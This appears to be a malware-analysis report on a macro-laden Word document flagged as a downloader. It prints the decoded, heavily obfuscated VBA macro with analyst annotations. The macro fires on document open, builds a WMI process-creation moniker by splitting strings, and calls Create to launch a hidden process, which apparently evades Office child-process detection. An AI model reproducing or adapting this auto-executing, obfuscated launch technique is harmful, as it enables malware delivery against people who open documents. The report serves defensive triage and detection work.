MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-7469465-0 critical CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Generic-7469465-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROS: Document contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJ: GetObject call. Matched line in script:
Set Oxpdajwxwikn = GetObject(Cnmwribhmd) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
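Embedded URL info EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body). This URL is the standard DrawingML XML namespace identifier; it was found in the document body, not in the macro, and is not an indicator of a download location.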
Extracted artifacts 1
Files carved from inside the sample during analysis.
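| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13076 bytes |

SHA-256: e70494f37e1c50eff52f2e5b18f9989bc0992a8ec39f1464f8017744e7e45d9f

Detection (for this extracted file):
ClamAV: No threats found. This result is for the decoded macro text only; the ClamAV detection listed under Heuristics applies to the original document.
Obfuscation or payload: likely
399 of 618 identifiers look randomly generated (e.g. 'hnkjKHK2222NNKLSess_') — consistent with name-mangling obfuscation. The quoted example occurs in the script inside a string literal passed to Split(), as part of a junk separator, so string-splitting obfuscation is present in addition to identifier mangling.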
Preview script: first 1,000 lines of the extracted script
' Header of the module named Erlcmaacrjkht. VB_Base below names Normal.ThisDocument, i.e. this is
' the document's own code module, which is where the Document_open handler that follows lives.
Attribute VB_Name = "Erlcmaacrjkht"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Declares a control named Jwlvepwqwmy (MSForms TextBox) on this module. The functions later in the
' listing read Erlcmaacrjkht.Jwlvepwqwmy as a string fragment; the control's value is stored in the
' document, not in this source listing, so it has to be recovered from the sample separately.
Attribute VB_Control = "Jwlvepwqwmy, 0, 0, MSForms, TextBox"
Private Sub Document_open()
' Auto-execution entry point: this handler is the line matched by the report's
' "Document_Open macro" finding. Word invokes it when the document is opened with macros enabled.
' The only statement here with an effect visible in this listing is the bare call to
' Hoyjjbxoslyxe below. Every other line is a Dim that is never used or an assignment whose
' target is never read again, and the right-hand names (e.g. Vukpzfspne) have no visible
' assignment in this listing. They appear to be filler that pads the macro and dilutes signatures.
Dim Nhbvbylgmem As Boolean
Dim Cajjbivcp As Double
Audfypjyz = Vukpzfspne
Qhhaesplytvu = (Fiwvoiosfpym)
Jzaagbmxroe = 933
Dim Hlcyqiezkt As Double
Mdycrcsjzby = "Consequatur voluptatem non iusto."
Dim Oeiiqhqiyhgc As Integer
Dim Efrzghjty As Boolean
Dim Zmmvkfnjcbdv As Boolean
Lbinvrzaunei = (404)
Dim Kmugumrvemnc As Integer
Dim Ogajzfvfagcx As Double
Syrcdwyqhxbec = Vztyglnnuiwwe
Dim Exqrcfvlyxu As Integer
Dim Ciucfifgiypne As Boolean
Dim Tgatfttdoknra As Integer
Alnplmouqwgh = (Bdyvyrswbtfje)
Sqernxeapzjf = ("Bessie")
Xylxfmhpwb = (Djujbhhb)
Dim Bqhawdivo As Boolean
Neuulztld = Ultuggxc
' The one functional statement: calls the function Hoyjjbxoslyxe defined later in the listing,
' which resolves two objects via GetObject and then calls a Create method.
Hoyjjbxoslyxe
Dim Xrinidnqlq As String
Dim Bkhxacvp As Integer
Qpknowcalfaj = Qlkvaqslgvz
Gqssukfbsc = (Rnlfocsqtho)
Ojzejpnj = 256
Dim Ktmfzomxiogjc As Boolean
Sshnsybar = "Corrupti."
Dim Fwjmhfhr As Boolean
Dim Bxscgjfduf As Double
Dim Xqxgwrxitvyy As String
Ovhbclfvqvo = (665)
Dim Pvwxbumysp As String
Dim Ptsrgyttqu As Boolean
Tcvmczcrlfhnw = Ewrvgfrnrndkw
Dim Wuladyzzwsn As Double
Dim Jmevhapxyzdrb As String
Dim Zyofwujn As Double
Uzfxvcsutdfii = (Ftxvhjciuaxeh)
Azcynbka = ("Quis et magni quibusdam.")
Kwhmzqqljqalr = (Sqkwxylgpdf)
Dim Puvtuyxnuw As Double
Hsyydohilv = Dfyzpsjtkgwpu
End Sub
' Header of a second module, Ykxhhqeiphnk. No code for it appears in this listing, but the functions
' below read string values from its members (Owyaiedlavwrr, Gcbaeextcqr, Lwvjxbiwjz, Anrnjpcd,
' Pnbqkntptofd.Tag, Lzpmrcefp.ControlTipText, Htuuqdwjrhs.ControlTipText).
' NOTE(review): the GUID-pair VB_Base and the .Tag / .ControlTipText accesses suggest a UserForm
' whose controls carry the hidden strings. Confirm by extracting the form data from the sample.
Attribute VB_Name = "Ykxhhqeiphnk"
Attribute VB_Base = "0{99811786-DD74-4A42-9BCA-65C97DC86D37}{7C709F61-1009-445B-992D-B64AB609621C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Start of a third module, Nidmcturqvl, which holds the two functions that follow.
Attribute VB_Name = "Nidmcturqvl"
Function Qcdlffgykm()
' Assembles and returns one string by concatenating values read from document controls.
' Hoyjjbxoslyxe later passes the result as part of the first argument to a Create call.
' Only four statements contribute to the result (annotated below). The remaining Dim lines and
' assignments are never read again in this listing and appear to be filler.
' The concatenated text itself is not present in the macro source: it lives in control
' properties inside the document, so static review of this listing alone cannot show what is
' passed to Create. Recover the control values from the sample to see the full string.
Dim Wpbevfmvc As Boolean
Dim Mdpyoxnm As Integer
Tlwvbyuezof = Huyqkjavzh
Xwflbepg = (Deithrrc)
Isiepgcdsuuek = 336
Dim Bpsyjpys As String
Thqcidwsore = "Asperiores enim aperiam rerum sit doloribus sit."
Dim Vubmnyiz As Double
Dim Qfczdehjaeo As Double
Dim Lakqxlwdynoxe As String
Ktvqauax = (60)
Dim Tohhejnzv As Integer
Dim Dhloxkrroc As String
Dzgjxveldeldw = Uebxirshlkcc
Dim Frcusdiyap As Integer
Dim Fhywhriowmne As Boolean
Dim Lruyusubx As Integer
Jekmweltqm = (Pcluvmsexc)
Rdbukxdklmxm = ("Quibusdam totam dolore.")
Aibkarbh = (Jyypeilgrsusc)
Dim Tjaxdeywtl As Double
Mcvqkyel = Ofdaqvfhhfkbg
' Step 1: start from the value of the TextBox control Jwlvepwqwmy on the ThisDocument module.
Kzwdjrnpdskn = Erlcmaacrjkht.Jwlvepwqwmy
Dim Xbbdoppxng As Integer
Dim Ikzitzalujndq As Double
Rwzrkdwrwc = Djsahzjezwcmo
Pnoxnydxanpzv = (Cfpcxbbjfehl)
Tndieheieqyz = 968
Dim Msznsgtwwlex As String
Itgmrchz = "Michele"
Dim Reouazeypjw As Boolean
Dim Tsfbxrreg As String
Dim Zlklhjln As Boolean
Vorzvwhfh = (581)
Dim Vpmtmbkht As Boolean
Dim Louppsrgyj As Boolean
Xenbbvkyyptew = Uibfmvkddfgg
Dim Bfypsppyzim As String
Dim Nvvqtrawyxd As String
Dim Nbkwvovk As String
Vpdicwjssd = (Hiomposdhuvsc)
Cnyndqkzbqj = ("Impedit ea ducimus veritatis.")
Pflptqtbiizhr = (Atlfpige)
Dim Dgwinwfqsnc As Double
Zmtmuezfl = Yhediriar
' Step 2: append three members of module Ykxhhqeiphnk (values not visible in this listing).
Cqqgkgebwjqma = Kzwdjrnpdskn + Ykxhhqeiphnk.Owyaiedlavwrr + Ykxhhqeiphnk.Gcbaeextcqr + Ykxhhqeiphnk.Lwvjxbiwjz
Dim Smdnkkwmgopk As Boolean
Dim Qsnsishsrfb As Double
Wbmrrwgn = Lsclcpqewwv
Inbjmavxmegal = (Ynacaebafgfca)
Jincdepmt = 835
Dim Qzowlqwugiwt As Boolean
Gmwcgxuwguxm = "Recusandae officia in voluptatem."
Dim Ribgpgocmiv As Integer
Dim Gvwmpfjxs As String
Dim Mpztstzyig As Integer
Hqeceeangrqnb = (878)
Dim Hhzszprtz As Integer
Dim Jsixhaexpwld As Double
Rfdvzmsjksrj = Ipwewjuh
Dim Kqjdtmveuz As Integer
Dim Nyzucaiqgy As String
Dim Pzzgguyk As Double
Kjcppywnoouy = (Fbhtyodmehntm)
Zbxjtnqrmkkus = ("Earum doloremque consequuntur est omnis minus.")
Hrxcbfmelmqyf = (Vlhponxo)
Dim Okuioukcgz As Boolean
Kmsnwlxcplvkp = Dukkdpsnur
' Step 3: append one more member and the Tag property of the control Pnbqkntptofd.
Wgghigccbtc = Cqqgkgebwjqma + Ykxhhqeiphnk.Anrnjpcd + Ykxhhqeiphnk.Pnbqkntptofd.Tag
Dim Bpfxuprnyhv As Boolean
Dim Jsqxrvfne As Double
Bwtrcxqt = Crhvmgitqoplv
Ohzvwbwmewxvz = (Rczggbjb)
Wunolpbmvoq = 291
Dim Byfedzoliipxn As Double
Auffvhzhjyt = "Dolorem vitae."
Dim Jevkaeyhaxfcp As String
Dim Lxqxdmlbjlu As String
Dim Rwfjssce As Integer
Wjnhaxzdg = (84)
Dim Vlhwcjxcmz As String
Dim Vqerwjwbjys As Double
Qfldkhomrvk = Qjebafqvrrv
Dim Tjcbxtnh As Double
Dim Mybrraeu As Double
Dim Itnwhxmesynp As String
Ofkpxrkfe = (Cznzumwbmtav)
Agipnqwatdlq = ("Nathan")
Cidpidexzfymr = (Onjeuxlbqq)
Dim Cfknexzzdqlnb As String
Hdqbziof = Luzqhmyu
' Step 4: set the return value. Eaehxywvguw has no visible assignment in this listing, so it
' presumably contributes nothing and the result is the string built in steps 1-3. Confirm.
Qcdlffgykm = Eaehxywvguw + Wgghigccbtc + Eaehxywvguw
Dim Wnqeobzuxeub As Integer
Dim Tmacbywzwjf As Boolean
Hxpctxxizdjph = Phjcrgogfbh
Wqhzrcrwhbbdt = (Jqnuhgkoacfr)
Kbliyljwkye = 251
Dim Ighyybuxponh As String
Bhwllyfwaq = "Qui."
Dim Tknfpphncise As Double
Dim Ytvnxbgzioo As Boolean
Dim Bnlgredikkjy As String
Dkspsevz = (973)
Dim Mstntcyr As Integer
Dim Gaqcazdhojmoz As Double
Ppzvhwbc = Zkpoilrvaudt
Dim Sbolboytsle As Double
Dim Vuaeygjaontgy As Boolean
Dim Ygzwzkdgiqav As Double
Sejvnwaap = (Hodoveduful)
Mososoxko = ("In dignissimos non odit dignissimos incidunt repudiandae ut.")
Ijkkysyrtjswz = (Lxbplgsbiz)
Dim Haicttggmu As Integer
Mwtszurswfdzj = Pphblugqrl
End Function
Function Hoyjjbxoslyxe()
' Main routine, called from Document_open. The functional statements (annotated below) are:
'   1. build an object moniker string by stripping a junk separator out of a literal,
'   2. bind to that object with GetObject (the line matched by the report's GetObject finding),
'   3. build a second moniker, bind to it, and set two of its properties to False,
'   4. call the first object's Create method with the string returned by Qcdlffgykm.
' All other Dim lines and assignments are never read again in this listing and appear to be filler.
Dim Onczecsprhcfq As String
Dim Qinxcylsuvulx As Boolean
Kqyefoswtuj = Drecynnqxoma
Hdkrudcwmgmo = (Ltdsstpcrsmky)
Bmddtktjcpc = 476
Dim Fxqkeqedl As Integer
Jgfmsfkfd = "Quod et libero et dolore corporis."
Dim Uilqnskacp As Boolean
Dim Xubcfiujq As Double
Dim Tnfhqxexmyvc As String
Ocmtlrsfxhrqc = (199)
Dim Iytcmrdhktcys As Double
Dim Brudqfhqea As Boolean
Pxpzvzadzbz = Lubzisann
Dim Wyorbipckdokv As Boolean
Dim Zrnkaszwf As String
Dim Rwhcabrpc As Boolean
Jcqmxkdxkg = (Tizdfhxc)
Vrsuhdmsf = ("Jeffrey")
Oiltovotia = (Vntaymhftb)
Dim Ztcdakrao As Boolean
Aojrmjjag = Xgodogxlr
' Junk separator used by the Split call below; it carries no meaning of its own.
iwoowjjjjj = "_&&*8992307&)hnkjKHK2222NNKLS"
Dim Dwufvaamri As Integer
Dim Pyxduabcmlk As Double
Anatmnjhmuz = Hwujpgknkze
Xxkzsmwrvmzsf = (Hcexbese)
Wdnbqowz = 873
Dim Lxmbneymjvq As String
Gfhugrvftc = "Ullam veniam incidunt ex."
Dim Ijpeyctsfskpc As Integer
Dim Fgvmnmrgwitqi As Boolean
Dim Ruqfevjhls As Boolean
Gnurswupyyq = (874)
Dim Qcswemlbva As Boolean
Dim Xfcvzjuqvltcq As Integer
Nbltdhunsrkg = Pkmdsurstz
Dim Tpejqgdtxzjhm As String
Dim Rjeododf As String
Dim Yxhcvhmfh As Integer
Iiaecmoqa = (Brzipkkhpkd)
Iwrbrxbfcxjb = ("Et.")
Acpoaahwpc = (Bvazvffiwgun)
Dim Elyuqglb As String
Zvccjmgoo = Gfdbevvnuhcpx
' String-splitting obfuscation: the literal is the real text with the junk separator inserted
' between short fragments. One copy of the separator is itself broken across a "+" so the
' separator cannot be matched as a single literal. With the separator removed, the fragments
' are "wi", "nm", "gmt", "s:W", "in", "32_" + <value of TextBox Jwlvepwqwmy>, "roc", "ess".
Pvjebntni = Split("_&&*8992307&)hnkjKHK2222NNKLSwi_&&*8992307&)hnkjKHK2222NNKLSnm_&&*8992307&)hnkjKHK2222NNKLSgmt_&&*8992307&)hnkjKH" + "K2222NNKLSs:W_&&*8992307&)hnkjKHK2222NNKLSin_&&*8992307&)hnkjKHK2222NNKLS32_" + Erlcmaacrjkht.Jwlvepwqwmy + "_&&*8992307&)hnkjKHK2222NNKLSroc_&&*8992307&)hnkjKHK2222NNKLSess_&&*8992307&)hnkjKHK2222NNKLS", iwoowjjjjj)
Dim Vupogwlkblzi As Double
Dim Chetjjhwlh As Double
Vlkpcxdbcgeir = Ccfiddjojg
Znzjijkaaa = (Cexjvdvcua)
Fybslxajcndn = 6
Dim Vyhpicqwgzfzs As Boolean
Wqzjfdjiro = "Consequatur nihil sint excepturi ut animi excepturi in ea ut."
Dim Cgoakhxhwuerb As Double
Dim Rcnmevyfxe As String
Dim Umqqagdnpsyvs As Boolean
Nclhictrgecxd = (655)
Dim Rvfkcvge As Integer
Dim Xpuzdrtjxl As Integer
Wwtbujmyiz = Bcphscgxgwk
Dim Sdmiogsxfzjqb As Boolean
Dim Sgcxfgyablque As Double
Dim Zlgccgzpu As Boolean
Qwdfrqbjeau = (Stckwxmnr)
Ykzyrsqienqcw = ("Brenda")
Asvbefzxjidp = (Gdzwdhhrcsmkl)
Dim Crfocxtspvuy As String
Qndxmykqgtn = Pdputrdhqx
' Re-joins the fragments with no separator: "winmgmts:Win32_" + <TextBox value> + "rocess".
' NOTE(review): the missing piece is presumably one character that completes a WMI class name
' for process creation. Confirm against the control value stored in the document.
Cnmwribhmd = Join(Pvjebntni, "")
Dim Vgapushyqlvee As Integer
Dim Cdzebdio As String
Bchkisyicg = Gnibcuhqk
Iugecbtn = (Ftqzohtxvb)
Vxlvaaoh = 359
Dim Aaypcovhjtlya As Boolean
Bomntpzeizjt = "Leigh"
Dim Szkjgspb As String
Dim Ebnreoxxq As Boolean
Dim Lbtgkbwpqsuog As Double
Botccaqhirbh = (577)
Dim Cmcdchxqcwrt As String
Dim Mjnhajnid As Double
Yvtkoitv = Gslejwkmxki
Dim Vzeuhqhtj As Boolean
Dim Dlefnnxy As Double
Dim Frccqncvfdtk As String
Lkomfouxdjays = (Knkxophcrqdey)
Itxftdylsc = ("Facere veniam quis.")
Nsbrvxxvq = (Zjehxvcjwut)
Dim Bmlvmbruo As Integer
Kpyihahuagxw = Apqtdouruqilb
' Binds to the object named by the moniker built above. The string starts with "winmgmts:", so
' this goes through the WMI scripting moniker rather than an application-level COM object.
Set Oxpdajwxwikn = GetObject(Cnmwribhmd)
Dim Abrwllssfedjm As Boolean
Dim Zewvxbfk As Boolean
Zriejtlbz = Arfkzimoabod
Yymhuurd = (Tjowkrhnbj)
Qkyttwneko = 294
Dim Lvzuesax As Boolean
Qqtqdiubbtdl = "Christian"
Dim Jbbvpmaf As Boolean
Dim Kpsniiialw As Boolean
Dim Zcsejimnz As String
Xkdqfhotlmi = (174)
Dim Qhttkczlhbb As Boolean
Dim Kcrspmlb As Boolean
Fscsxcju = Eocptcwzcqjbs
Dim Mcsxwumwfnbij As Boolean
Dim Ygkbxwzczn As Double
Dim Zeseazvlaq As Integer
Dsrxbsumxtrc = (Famatjginrm)
Ioqihipy = ("Quas aut repellendus est consectetur nulla non qui adipisci.")
Cahtcogmq = (Tvzaxoouea)
Dim Rlygkkuasavk As Integer
Qduhfvvrot = Jubdaeqip
' Second moniker: the first moniker extended with two ControlTipText values from module
' Ykxhhqeiphnk (not visible in this listing).
Kecjwbbcrczed = Cnmwribhmd + Ykxhhqeiphnk.Lzpmrcefp.ControlTipText + Ykxhhqeiphnk.Htuuqdwjrhs.ControlTipText
Dim Srbduyalgzjfe As String
Dim Rlyqinhzzse As Integer
Addislvuqmtab = Utyexgqgh
Mlsblqidldv = (Sswazephncf)
Zsqjwwrdzkcp = 150
Dim Rxobzskm As String
Qhcahyjmvr = "Nam corporis voluptates esse molestiae nihil."
Dim Ncgzjksiuly As Integer
Dim Kzafojnogsptq As Integer
Dim Bptjnbkl As Boolean
Iztwpfib = (491)
Dim Yjhhhcbgjqfsp As Boolean
Dim Erpovanef As Double
Urqnhsnyds = Bkadceuqkb
Dim Nsnhwkebcx As Boolean
Dim Pwjnfqoowf As Integer
Dim Vwlakpzs As Integer
Zofgbsngk = (Pogvhltn)
Ifjlzzeqnxp = ("Rerum.")
Wviyovbqvj = (Ifedefeas)
Dim Vubtjpxgmh As String
Azmfszxnwh = Uznirkhrgmm
' ...and terminated with the same TextBox value that was used inside the first moniker.
Jrqzrkjyonpu = Kecjwbbcrczed + Erlcmaacrjkht.Jwlvepwqwmy
Dim Uqlzyfgghwf As Boolean
Dim Hiboyphdfedt As String
Pigztcdpsl = Ilobbvlbppcer
Lolifssry = (Lborqquzgvpdd)
Dwafchiur = 61
Dim Cogpupbej As String
Yzmjsemwlia = "Molestiae."
Dim Vrtxodgwqjn As Boolean
Dim Qazcyyyqyast As Integer
Dim Ivpxcrru As String
Dpfdqhpydznlw = (216)
Dim Byywqadzzx As Double
Dim Mlocwxdy As Integer
Vzrktqqqxzgn = Sxnvzpgfpgdn
Dim Roskaicyefgnj As String
Dim Buykujzj As Double
Dim Tmpklhgbszigw As Double
Qushomgxfolf = (Orekmhvnotxa)
Jrvylreogbu = ("Beatae.")
Ojvaccgehev = (Xcgzjnzpo)
Dim Ntmqzlcqzugd As String
Vyflbnzogubi = Gnxavcmjqqfw
' Binds to the second object and stores it as this function's own return value, so the name
' Hoyjjbxoslyxe below refers to that object.
' NOTE(review): given the XSize/YSize writes that follow, this is presumably a WMI
' process-startup configuration object. Confirm from the recovered control strings.
Set Hoyjjbxoslyxe = GetObject(Jrqzrkjyonpu)
Dim Nqmuxfhulx As Integer
Dim Kpufgkre As String
Tqjdejqdrhl = Hvtbpkubxbf
Kngvalay = (Lubxdhftpnxmk)
Cupnvoewaz = 272
Dim Vgawtkzihomqu As Integer
Ptgxdumyq = "Cumque recusandae."
Dim Bhhyayakkn As String
Dim Eckdbnhytdho As Double
Dim Cadihkkiisbj As Boolean
Qkhuabbusqk = (280)
Dim Mrxatvgvz As String
Dim Fegwuscs As Double
Ijwnnashhmyx = Qksinhsqcgowu
Dim Znrkpeib As String
Dim Vnnsudici As Boolean
Dim Aufsargpyq As Boolean
Hhygmmuijfc = (Eyicgtmzrztm)
Mcloppzgkvx = ("Voluptate.")
Nxavsmywsxm = (Spqiftuyhgxqn)
Dim Yonfkczbqeaz As Boolean
Ueywrwkqbpdb = Rcefjexek
' Sets the object's XSize property to False. Presumably a window-size setting. Confirm.
Hoyjjbxoslyxe.XSize = False
Dim Olmteyhmrm As Integer
Dim Escflauhxgkz As String
Camnlzhcqxrug = Tmmbtnwk
Ygnliammhvgae = (Lbbenrtv)
Tyyokgqz = 901
Dim Suriwfhzeut As Double
Yhlvfzielg = "Consequatur explicabo temporibus quidem."
Dim Coywppbrokr As Integer
Dim Iijuqmklnagy As Double
Dim Afihnjuuqj As Double
Erqwnpbcxqy = (853)
Dim Twcoorxeeblf As String
Dim Aynsarbi As Boolean
Rmqxiojgynun = Crfkaqfrl
Dim Djyyssld As Boolean
Dim Cbavqregojnhh As Double
Dim Mqhcpaaexf As Boolean
Igvikijaqe = (Zakwdmvcip)
Daswbxcq = ("Dignissimos ullam sapiente.")
Vatadyyps = (Xdppeakj)
Dim Tztfjqmy As Double
Yytejccj = Twzagwdg
' Sets the object's YSize property to False, the companion of the XSize write above.
Hoyjjbxoslyxe.YSize = False
Dim Qatefyuxevxhv As Integer
Dim Slntamzrl As Integer
Idveodulfgcbk = Nezkpdedfusig
Iibhqrbahunk = (Qkdoazus)
Udzpjvvoboy = 8
Dim Coildrqcsybpk As Boolean
Fkwphonmrlql = "Voluptatum at quis."
Dim Irdwkbasnrbkk As String
Dim Xazhcjrri As Boolean
Dim Obqamgrejh As Integer
Znsnwfowdmht = (20)
Dim Ewpraujznzbn As Boolean
Dim Tgrxzgzujvul As Boolean
Ibtxovcupsg = Aztmjbtcwu
Dim Esjntwoatqlg As String
Dim Isyrzqwwyupjk As Integer
Dim Nmhjcjcs As Integer
Vscqkonilsbe = (Tyhtpxkmdzfee)
Ofzrwdyt = ("Ut molestias eos quia quia voluptatum.")
Fcazrzjhlpe = (Cjljodlfkp)
Dim Mbmisuebekujn As Boolean
Wwshwmwwhkujq = Untcfxwztu
' Execution step: calls Create on the first object. The first argument is the string returned
' by Qcdlffgykm (KSNNSN has no visible assignment, so it presumably adds nothing), and the third
' argument is the second object configured above. Eekulpmk and Lbhttlvfk are likewise unassigned.
' The empty loop body repeats the call for as long as Create returns a non-zero value.
' NOTE(review): if this resolves to WMI process creation, the new process is started by the WMI
' provider host rather than by Word, so detections keyed only on child processes of the Office
' application would not see it. Check sandbox/EDR telemetry for WMI-originated process creation
' following the document open, and for policy that blocks it, to confirm and to mitigate.
Do While Oxpdajwxwikn.Create(KSNNSN & Qcdlffgykm, Eekulpmk, Hoyjjbxoslyxe, Lbhttlvfk)
Loop
Dim Wmcitsjivedkr As Boolean
Dim Kwmklsnl As String
Sqsenudjumqf = Dsfqnrfhoybr
Phibtqabqdik = (Xxlftugt)
Yrmlbucvgjtmd = 572
Dim Nqccchcsfj As Integer
Wytnwvkdbd = "Consequatur itaque id aut."
Dim Vamdqgktwsfde As Boolean
Dim Qvzhbkhgxn As Double
Dim Rtlkjbdgbuzcy As Double
Pdspjekuicwnp = (629)
Dim Pquitzlhwcbl As Integer
Dim Vxidlscexmsgz As Integer
Mnnsgeihqf = Vwnitcyme
Dim Dvsltiqmah As Double
Dim Onscrmprxm As String
Dim Hkeyebqey As Double
Xotpzasyww = (Vbzgzowmrildj)
Hzrukkcunyx = ("Maureen")
Eoqjulixeurp = (Spcpgvilyfc)
Dim Shlicyehdrc As Double
Vudfzfjtjfliq = Tplhswqpsl
End Function